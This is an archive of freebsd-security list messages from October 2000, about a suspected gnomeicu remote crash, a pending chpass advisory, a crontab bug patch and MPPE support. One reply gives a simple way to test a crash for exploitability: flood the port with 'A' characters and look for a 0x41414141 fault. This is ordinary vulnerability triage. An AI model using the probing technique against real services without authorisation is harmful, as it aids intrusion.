From owner-freebsd-security Sun Oct 29 10: 0:46 2000 Delivered-To: freebsd-security@freebsd.org Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id 7294C37B479; Sun, 29 Oct 2000 10:00:38 -0800 (PST) Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 13pwkz-0000Y2-00; Sun, 29 Oct 2000 20:00:33 +0200 Date: Sun, 29 Oct 2000 20:00:32 +0200 (IST) From: Roman Shterenzon To: Jeremy Norris Cc: ports@FreeBSD.ORG, security@freebsd.org Subject: Re: Remote buffer overflow in gnomeicu 0.93 In-Reply-To: <20001029072540.A89648@babylon.merseine.nu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 29 Oct 2000, Jeremy Norris wrote: > Gnomeicu doesn't run with any privelege however, unless one is foolish enough > to run it as root. At worse, a deviant person could crash it and gain access as > an unprivleged user. Is thate enough to make a port FORBIDDEN? It's a serious security breach, like giving someone to login as you without a password. That's exactly the same. Seems like a very serious problem to me. It's just a matter of time when the attacker will elevate her priveledges. > Jeremy > > On Sun, Oct 29, 2000 at 01:38:30AM +0200, Roman Shterenzon wrote: > > On Sat, 28 Oct 2000, Jeremy Norris wrote: > > > > > I would think this would be a problem with all icq clients, since icq opens up > > > a tcp port by default. Gnomeicu at least, however, lets you pick what port. > > > > > > Jeremy > > But, gnomeicu is the only one I've seen that crashes when sent too much > > data on that port. > > That's security breach. > > > > > On Sat, Oct 28, 2000 at 12:46:08AM +0200, Roman Shterenzon wrote: > > > > Hi, > > > > > > > > Yesterday, running sockstat I noticed that openicu listens on TCP port 4000. > > > > I was curious so I fed it with some zeroes from /dev/zero, and, it crashed > > > > like a charm. I'm suspecting buffer overflow which may allow an intruder > > > > to receive a shell on victim's machine. > > > > Looking at code advises that the port can be chosen from 4000-4100 range. > > > > I believe it needs to be checked and the port marked as FORBIDDEN meanwhile. > > > > Sorry if it's false alarm. > > > > > > > > --Roman Shterenzon, UNIX System Administrator and Consultant > > > > [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > > with "unsubscribe freebsd-ports" in the body of the message > > > > > > > --Roman Shterenzon, UNIX System Administrator and Consultant > > [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-ports" in the body of the message > --Roman Shterenzon, UNIX System Administrator and Consultant [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 29 10: 6:39 2000 Delivered-To: freebsd-security@freebsd.org Received: from iclub.nsu.ru (iclub.nsu.ru [193.124.222.66]) by hub.freebsd.org (Postfix) with ESMTP id 8CADB37B479 for ; Sun, 29 Oct 2000 10:06:29 -0800 (PST) Received: from localhost (fjoe@localhost) by iclub.nsu.ru (8.9.3/8.9.3) with ESMTP id AAA54133 for ; Mon, 30 Oct 2000 00:06:25 +0600 (NS) (envelope-from fjoe@iclub.nsu.ru) Date: Mon, 30 Oct 2000 00:06:25 +0600 (NS) From: Max Khon To: security@freebsd.org Subject: chpass advisory Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org hi, there! I can't find chpass advisory in my -announce archive. Can someone point me at it (if it was issued at all)? thanks, /fjoe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 29 10:29:43 2000 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.com (gw.nectar.com [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id B253337B4C5; Sun, 29 Oct 2000 10:29:36 -0800 (PST) Received: from hamlet.nectar.com (hamlet.nectar.com [10.0.1.102]) by gw.nectar.com (Postfix) with ESMTP id 268BA193DF; Sun, 29 Oct 2000 12:29:35 -0600 (CST) Received: (from nectar@localhost) by hamlet.nectar.com (8.11.1/8.9.3) id e9TITZq69728; Sun, 29 Oct 2000 12:29:35 -0600 (CST) (envelope-from nectar@spawn.nectar.com) Date: Sun, 29 Oct 2000 12:29:34 -0600 From: "Jacques A. Vidrine" To: Roman Shterenzon Cc: Jeremy Norris , ports@FreeBSD.ORG, security@freebsd.org Subject: Re: Remote buffer overflow in gnomeicu 0.93 Message-ID: <20001029122934.A69717@hamlet.nectar.com> References: <20001029072540.A89648@babylon.merseine.nu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from roman@xpert.com on Sun, Oct 29, 2000 at 08:00:32PM +0200 X-Url: http://www.nectar.com/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, Oct 29, 2000 at 08:00:32PM +0200, Roman Shterenzon wrote: > On Sun, 29 Oct 2000, Jeremy Norris wrote: > > Gnomeicu doesn't run with any privelege however, unless one is > > foolish enough to run it as root. At worse, a deviant person could > > crash it and gain access as an unprivleged user. Is thate enough to > > make a port FORBIDDEN? > It's a serious security breach, like giving someone to login as you > without a password. That's exactly the same. Seems like a very serious > problem to me. > It's just a matter of time when the attacker will elevate her priveledges. Except that the bug in question is not a buffer overflow, and does not appear to have security consequences. I trust you have already reported the bug to the author -- when you get a reply, I would be happy to see it, too. -- Jacques Vidrine / n@nectar.com / jvidrine@verio.net / nectar@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 29 13:25: 5 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 00D2737B479 for ; Sun, 29 Oct 2000 13:25:02 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id e9TLOS199203; Sun, 29 Oct 2000 13:24:28 -0800 (PST) (envelope-from kris) Date: Sun, 29 Oct 2000 13:24:28 -0800 From: Kris Kennaway To: Max Khon Cc: security@FreeBSD.ORG Subject: Re: chpass advisory Message-ID: <20001029132428.A99164@citusc17.usc.edu> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="XsQoSWH+UP9D9v3l" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from fjoe@iclub.nsu.ru on Mon, Oct 30, 2000 at 12:06:25AM +0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --XsQoSWH+UP9D9v3l Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Mon, Oct 30, 2000 at 12:06:25AM +0600, Max Khon wrote: > hi, there! >=20 > I can't find chpass advisory in my -announce archive. Can someone point me > at it (if it was issued at all)? > thanks, Will be issued tomorrow. I've been busy and am trying to deal with the backlog. Kris --XsQoSWH+UP9D9v3l Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use MessageID: 7u9ZMZt8LjucYAV6h+NtPRkeSnpaBWbG iQA/AwUBOfyVi1q8tAVo6EClEQI9nwCdFlkpvq4k5Pa0H24ipJM+gwuKXckAoM72 xj3L5CYm5Ngsrt7HhnheElJU =JziI -----END PGP SIGNATURE----- --XsQoSWH+UP9D9v3l-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 29 22:10:26 2000 Delivered-To: freebsd-security@freebsd.org Received: from epsilon.lucida.qc.ca (epsilon.lucida.qc.ca [216.95.146.6]) by hub.freebsd.org (Postfix) with SMTP id 29F9A37B479 for ; Sun, 29 Oct 2000 22:10:24 -0800 (PST) Received: (qmail 3538 invoked by uid 1000); 30 Oct 2000 06:10:18 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 30 Oct 2000 06:10:18 -0000 Date: Mon, 30 Oct 2000 01:10:15 -0500 (EST) From: Matt Heckaman X-Sender: matt@epsilon.lucida.qc.ca To: FreeBSD-SECURITY Subject: crontab problem Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Spam-Rating: localhost 1.6.2 0/1000/N Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi all, Does anyone have a patch for the crontab problem describe on bugtraq? I need to get it fixed and can't afford a make world. A patch or the pair of revision numbers would be great, thanks. :) Matt * Matt Heckaman - mailto:matt@lucida.qc.ca http://www.lucida.qc.ca/ * * GPG fingerprint - A9BC F3A8 278E 22F2 9BDA BFCF 74C3 2D31 C035 5390 * -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: http://www.lucida.qc.ca/pgp iD8DBQE5/RDKdMMtMcA1U5ARAtsLAJ9IzpihFB3WXInAVjOewpxU90bdgQCbBEOc WVZvbUAhxgClYDTsaoQ7ygY= =U1MF -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 29 22:23:47 2000 Delivered-To: freebsd-security@freebsd.org Received: from inter.stack.ru (inter.stack.ru [212.20.57.225]) by hub.freebsd.org (Postfix) with ESMTP id 5C6C537B479 for ; Sun, 29 Oct 2000 22:23:44 -0800 (PST) Received: from exch.stack.ru (exch.stack.ru [212.20.57.217]) by inter.stack.ru (8.9.3/8.9.3) with ESMTP id NAA18555 for ; Mon, 30 Oct 2000 13:23:42 +0700 (KRS) Received: by exch.stack.ru with Internet Mail Service (5.5.2448.0) id <4LT9BHWL>; Mon, 30 Oct 2000 13:23:41 +0700 Message-ID: <807044A67EA3D211B11D00A024E91A45F2D218@exch.stack.ru> From: "Tolpanov, Dmitry" To: "'freebsd-security@FreeBSD.ORG'" Subject: MPPE. Date: Mon, 30 Oct 2000 13:23:41 +0700 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2448.0) Content-Type: text/plain; charset="koi8-r" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello. I have the FreeBSD 4.1, recently compile and install poptop-1.0.0. Then i chose pppd for PPP link. Everything is working fine, but I can't make support for MPPE. As i understand I should upgrade the kernel. Don't anybody know where i can find info about this or may be there are some patches especially for FreeBSD 4.1. Thanks. Dmitry. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 29 22:47:22 2000 Delivered-To: freebsd-security@freebsd.org Received: from InterJet.dellroad.org (adsl-63-194-81-26.dsl.snfc21.pacbell.net [63.194.81.26]) by hub.freebsd.org (Postfix) with ESMTP id BDFB037B479 for ; Sun, 29 Oct 2000 22:47:20 -0800 (PST) Received: from curve.dellroad.org (curve.dellroad.org [10.1.1.30]) by InterJet.dellroad.org (8.9.1a/8.9.1) with ESMTP id WAA88115; Sun, 29 Oct 2000 22:47:20 -0800 (PST) Received: (from archie@localhost) by curve.dellroad.org (8.11.0/8.11.0) id e9U6lKp42885; Sun, 29 Oct 2000 22:47:20 -0800 (PST) (envelope-from archie) From: Archie Cobbs Message-Id: <200010300647.e9U6lKp42885@curve.dellroad.org> Subject: Re: MPPE. In-Reply-To: <807044A67EA3D211B11D00A024E91A45F2D218@exch.stack.ru> "from Tolpanov, Dmitry at Oct 30, 2000 01:23:41 pm" To: "Tolpanov, Dmitry" Date: Sun, 29 Oct 2000 22:47:19 -0800 (PST) Cc: "'freebsd-security@FreeBSD.ORG'" X-Mailer: ELM [version 2.4ME+ PL82 (25)] MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Tolpanov, Dmitry writes: > I have the FreeBSD 4.1, recently compile and install poptop-1.0.0. Then i > chose pppd for PPP link. Everything is working fine, but I can't make > support for MPPE. As i understand I should upgrade the kernel. > Don't anybody know where i can find info about this or may be there are some > patches especially for FreeBSD 4.1. You might try the net/mpd-netgraph port, which supports MPPE and PPTP as well. I'd suggest upgrading to -stable or at least 4.1.1 as well. -Archie __________________________________________________________________________ Archie Cobbs * Packet Design * http://www.packetdesign.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 30 0:43:47 2000 Delivered-To: freebsd-security@freebsd.org Received: from aes.thinksec.com (unknown [193.212.248.16]) by hub.freebsd.org (Postfix) with ESMTP id D682137B479 for ; Mon, 30 Oct 2000 00:43:44 -0800 (PST) Received: by aes.thinksec.com (Postfix, from userid 2602) id C0DE31BF994; Mon, 30 Oct 2000 09:43:43 +0100 (CET) X-URL: http://www.ofug.org/~des/ To: Roman Shterenzon Cc: freebsd-security@freebsd.org Subject: Re: [roman@xpert.com: Remote buffer overflow in gnomeicu 0.93] References: <20001028020359.A61199@alchemy.oven.org> From: Dag-Erling Smorgrav Date: 30 Oct 2000 09:43:42 +0100 In-Reply-To: Roman Shterenzon's message of "Sat, 28 Oct 2000 02:03:59 +0200" Message-ID: Lines: 13 User-Agent: Gnus/5.0807 (Gnus v5.8.7) Emacs/20.7 MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Roman Shterenzon writes: > Yesterday, running sockstat I noticed that openicu listens on TCP port 40= 00. > I was curious so I fed it with some zeroes from /dev/zero, and, it crashed > like a charm. I'm suspecting buffer overflow which may allow an intruder > to receive a shell on victim's machine. Instead of feeding it zeroes, try feeding it A's (e.g. using 'cat /dev/zero | tr \\0 A') and see if it crashes trying to dereference 0x41414141; if it does, it's likely to be exploitable. DES --=20 Dag-Erling Sm=F8rgrav - des@thinksec.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 30 1:27: 2 2000 Delivered-To: freebsd-security@freebsd.org Received: from holmes.infopro.spb.su (holmes.infopro.spb.su [195.242.2.2]) by hub.freebsd.org (Postfix) with ESMTP id 53DCF37B479 for ; Mon, 30 Oct 2000 01:26:59 -0800 (PST) Received: from barrymore.peterlink.ru (barrymore.peterlink.ru [195.242.2.8]) by holmes.infopro.spb.su (8.9.1/8.9.1) with ESMTP id MAA23382 for ; Mon, 30 Oct 2000 12:26:57 +0300 (MSK) Received: from apraksin.ru (spb-4-208.dialup.peterlink.ru [195.242.19.208]) by barrymore.peterlink.ru (8.9.1/8.9.1) with ESMTP id MAA15892 for ; Mon, 30 Oct 2000 12:26:55 +0300 (MSK) Received: from KOSTIK [220.0.0.1] by apraksin.ru [220.0.0.1] with SMTP (MDaemon.v3.1.2.R) for ; Mon, 30 Oct 2000 12:17:41 +0300 Date: Mon, 30 Oct 2000 12:17:36 +0300 From: News X-Mailer: The Bat! (v1.46c) Business Reply-To: News X-Priority: 3 (Normal) Message-ID: <4550015137.20001030121736@apraksin.ru> To: FreeBSD-security@FreeBSD.org Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-MDRcpt-To: FreeBSD-security@FreeBSD.org X-MDRemoteIP: 220.0.0.1 X-Return-Path: news@apraksin.ru X-MDaemon-Deliver-To: FreeBSD-security@FreeBSD.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org lists help To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 30 1:42:43 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 044DC37B4C5 for ; Mon, 30 Oct 2000 01:42:40 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id e9U9ieC11937; Mon, 30 Oct 2000 01:44:40 -0800 (PST) (envelope-from kris) Date: Mon, 30 Oct 2000 01:44:40 -0800 From: Kris Kennaway To: Matt Heckaman Cc: FreeBSD-SECURITY Subject: Re: crontab problem Message-ID: <20001030014440.A11913@citusc17.usc.edu> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="LQksG6bCIzRHxTLp" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from matt@ARPA.MAIL.NET on Mon, Oct 30, 2000 at 01:10:15AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --LQksG6bCIzRHxTLp Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Mon, Oct 30, 2000 at 01:10:15AM -0500, Matt Heckaman wrote: > Hi all, >=20 > Does anyone have a patch for the crontab problem describe on bugtraq? I > need to get it fixed and can't afford a make world. A patch or the pair > of revision numbers would be great, thanks. :) There was a patch posted to -audit a few days ago which is yet unreviewed but claims to address the issue. Note that we've been unable to replicate the claimed full impact of the problem on FreeBSD - the impact seems to be limited to reading files which are a valid cron job syntax, meaning basically files which are entirely commented out, or actual cron jobs (e.g. those owned by other users). Still a problem, though. Kris --LQksG6bCIzRHxTLp Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjn9QwcACgkQWry0BWjoQKV7OQCg0r7zKT84Zitsh8D68j+2IfPI omsAoPvGAAYJWyg1tKiAlvvk8yCzx/aj =cOv6 -----END PGP SIGNATURE----- --LQksG6bCIzRHxTLp-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 30 1:50:34 2000 Delivered-To: freebsd-security@freebsd.org Received: from epsilon.lucida.qc.ca (epsilon.lucida.qc.ca [216.95.146.6]) by hub.freebsd.org (Postfix) with SMTP id 335E637B4C5 for ; Mon, 30 Oct 2000 01:50:32 -0800 (PST) Received: (qmail 4149 invoked by uid 1000); 30 Oct 2000 09:50:31 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 30 Oct 2000 09:50:31 -0000 Date: Mon, 30 Oct 2000 04:50:30 -0500 (EST) From: Matt Heckaman X-Sender: matt@epsilon.lucida.qc.ca To: Kris Kennaway Cc: FreeBSD-SECURITY Subject: Re: crontab problem In-Reply-To: <20001030014440.A11913@citusc17.usc.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Spam-Rating: localhost 1.6.2 0/1000/N Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Thanks Kris, I'll pull the patch out of the archives for -audit, hopefully it's been archived already; as I don't know how often the posts are added to the archive. I'll do some testing here on a few machines and see what comes out of it. - -Matt On Mon, 30 Oct 2000, Kris Kennaway wrote: : There was a patch posted to -audit a few days ago which is yet : unreviewed but claims to address the issue. Note that we've been : unable to replicate the claimed full impact of the problem on FreeBSD : - the impact seems to be limited to reading files which are a valid : cron job syntax, meaning basically files which are entirely commented : out, or actual cron jobs (e.g. those owned by other users). Still a : problem, though. : : Kris * Matt Heckaman - mailto:matt@lucida.qc.ca http://www.lucida.qc.ca/ * * GPG fingerprint - A9BC F3A8 278E 22F2 9BDA BFCF 74C3 2D31 C035 5390 * -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: http://www.lucida.qc.ca/pgp iD8DBQE5/URndMMtMcA1U5ARAiNYAJ9O+zEMheMMSSn42u0jg3tgxXFyhwCg8TwI FREZW4YLKIBeaWVDDzTzZZ8= =C1ey -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 30 1:55:21 2000 Delivered-To: freebsd-security@freebsd.org Received: from epsilon.lucida.qc.ca (epsilon.lucida.qc.ca [216.95.146.6]) by hub.freebsd.org (Postfix) with SMTP id 5222137B661 for ; Mon, 30 Oct 2000 01:55:14 -0800 (PST) Received: (qmail 4176 invoked by uid 1000); 30 Oct 2000 09:55:13 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 30 Oct 2000 09:55:13 -0000 Date: Mon, 30 Oct 2000 04:55:09 -0500 (EST) From: Matt Heckaman X-Sender: matt@epsilon.lucida.qc.ca To: Kris Kennaway Cc: FreeBSD-SECURITY Subject: Re: crontab problem In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Spam-Rating: localhost 1.6.2 0/1000/N Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Mon, 30 Oct 2000, Matt Heckaman wrote: : Thanks Kris, I'll pull the patch out of the archives for -audit, hopefully ... Doh! No I wont. I wondered why I hadn't heard of -audit before. Since I can't find it in the list of the archive search I assume that it is a private list, yes? Ah well. :) * Matt Heckaman - mailto:matt@lucida.qc.ca http://www.lucida.qc.ca/ * * GPG fingerprint - A9BC F3A8 278E 22F2 9BDA BFCF 74C3 2D31 C035 5390 * -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: http://www.lucida.qc.ca/pgp iD8DBQE5/UWBdMMtMcA1U5ARAl3mAKC/U8Qe9KcR9UZD+BYZKTOM7OZb8gCg0NDh prVsN6SY0X4qAh5eCVc8ZR8= =v71V -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 30 1:59: 2 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 0767F37B479 for ; Mon, 30 Oct 2000 01:58:58 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id e9UA15r12356; Mon, 30 Oct 2000 02:01:05 -0800 (PST) (envelope-from kris) Date: Mon, 30 Oct 2000 02:01:04 -0800 From: Kris Kennaway To: Matt Heckaman Cc: FreeBSD-SECURITY Subject: Re: crontab problem Message-ID: <20001030020104.A12329@citusc17.usc.edu> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="AhhlLboLdkugWU4S" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from matt@ARPA.MAIL.NET on Mon, Oct 30, 2000 at 04:55:09AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --AhhlLboLdkugWU4S Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Mon, Oct 30, 2000 at 04:55:09AM -0500, Matt Heckaman wrote: > On Mon, 30 Oct 2000, Matt Heckaman wrote: >=20 > : Thanks Kris, I'll pull the patch out of the archives for -audit, hopefu= lly > ... >=20 > Doh! No I wont. I wondered why I hadn't heard of -audit before. Since I > can't find it in the list of the archive search I assume that it is a > private list, yes? Ah well. :) It's archived, but probably not in the search engine. Browse on docs.freebsd.org. Kris --AhhlLboLdkugWU4S Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjn9Rt8ACgkQWry0BWjoQKXXygCg6kGUr8EWSkIMGRzqcd7UYK1U bKoAnAhOdCjinjV7VqLKcawD4jBawZpr =H02g -----END PGP SIGNATURE----- --AhhlLboLdkugWU4S-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 30 2:51:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from epsilon.lucida.qc.ca (epsilon.lucida.qc.ca [216.95.146.6]) by hub.freebsd.org (Postfix) with SMTP id 30E7337B4C5 for ; Mon, 30 Oct 2000 02:51:09 -0800 (PST) Received: (qmail 4673 invoked by uid 1000); 30 Oct 2000 10:51:08 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 30 Oct 2000 10:51:08 -0000 Date: Mon, 30 Oct 2000 05:51:07 -0500 (EST) From: Matt Heckaman X-Sender: matt@epsilon.lucida.qc.ca To: Kris Kennaway Cc: FreeBSD-SECURITY Subject: Re: crontab problem In-Reply-To: <20001030020104.A12329@citusc17.usc.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Spam-Rating: localhost 1.6.2 0/1000/N Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Mon, 30 Oct 2000, Kris Kennaway wrote: ... : It's archived, but probably not in the search engine. Browse on : docs.freebsd.org. Yep, found it. It doesn't break anything for me on my 4.1.1 and 3.5 machines, it works as expected. Also, to note the author's concerns about certain editors that unlink the file they are editing, both joe and pico work fine as far as I can tell with this patch. Between those two and his list in the email, that's just about every popular editor.. *ducks flame wars about which is more popular* :) : Kris : * Matt Heckaman - mailto:matt@lucida.qc.ca http://www.lucida.qc.ca/ * * GPG fingerprint - A9BC F3A8 278E 22F2 9BDA BFCF 74C3 2D31 C035 5390 * -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: http://www.lucida.qc.ca/pgp iD8DBQE5/VKcdMMtMcA1U5ARAk22AKChsuQy0ctULI+ThQuCN7YCd7N7vQCfWgjf ttUiYqTLdc6DXrD5FYfwvLM= =oWkn -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 30 2:57:19 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 7961537B4CF for ; Mon, 30 Oct 2000 02:57:15 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id e9UAxNt12840; Mon, 30 Oct 2000 02:59:23 -0800 (PST) (envelope-from kris) Date: Mon, 30 Oct 2000 02:59:23 -0800 From: Kris Kennaway To: Matt Heckaman Cc: FreeBSD-SECURITY Subject: Re: crontab problem Message-ID: <20001030025923.A12824@citusc17.usc.edu> References: <20001030020104.A12329@citusc17.usc.edu> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="2oS5YaxWCcQjTEyO" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from matt@ARPA.MAIL.NET on Mon, Oct 30, 2000 at 05:51:07AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --2oS5YaxWCcQjTEyO Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Mon, Oct 30, 2000 at 05:51:07AM -0500, Matt Heckaman wrote: > On Mon, 30 Oct 2000, Kris Kennaway wrote: > ... > : It's archived, but probably not in the search engine. Browse on > : docs.freebsd.org. >=20 > Yep, found it. It doesn't break anything for me on my 4.1.1 and 3.5 > machines, it works as expected. Also, to note the author's concerns about > certain editors that unlink the file they are editing, both joe and pico > work fine as far as I can tell with this patch. Between those two and his > list in the email, that's just about every popular editor.. *ducks flame > wars about which is more popular* :) Thanks for the feedback. Hopefully we'll get this committed in the next few days. Kris --2oS5YaxWCcQjTEyO Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjn9VIoACgkQWry0BWjoQKWArgCg7op4XuGvY0FVBAeD56PSe6Lz mwUAoON0ODYTlzfQJAdCz8pRDGdCy3XN =Jmlv -----END PGP SIGNATURE----- --2oS5YaxWCcQjTEyO-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 30 4:46:10 2000 Delivered-To: freebsd-security@freebsd.org Received: from relay2.wertep.com (relay2.wertep.com [194.44.90.130]) by hub.freebsd.org (Postfix) with ESMTP id 7BFD737B479 for ; Mon, 30 Oct 2000 04:46:05 -0800 (PST) Received: from She.wertep.com (she-tun-proxy [192.168.252.2]) by relay2.wertep.com (8.9.3/8.9.3) with ESMTP id OAA77049 for ; Mon, 30 Oct 2000 14:46:02 +0200 (EET) (envelope-from petro@She.wertep.com) Received: from localhost (petro@localhost) by She.wertep.com (8.9.3/8.9.3) with ESMTP id OAA97883 for ; Mon, 30 Oct 2000 14:50:47 +0200 (EET) (envelope-from petro@She.wertep.com) Date: Mon, 30 Oct 2000 14:50:47 +0200 (EET) From: petro To: freebsd-security@FreeBSD.ORG Subject: Need help!!! Message-ID: 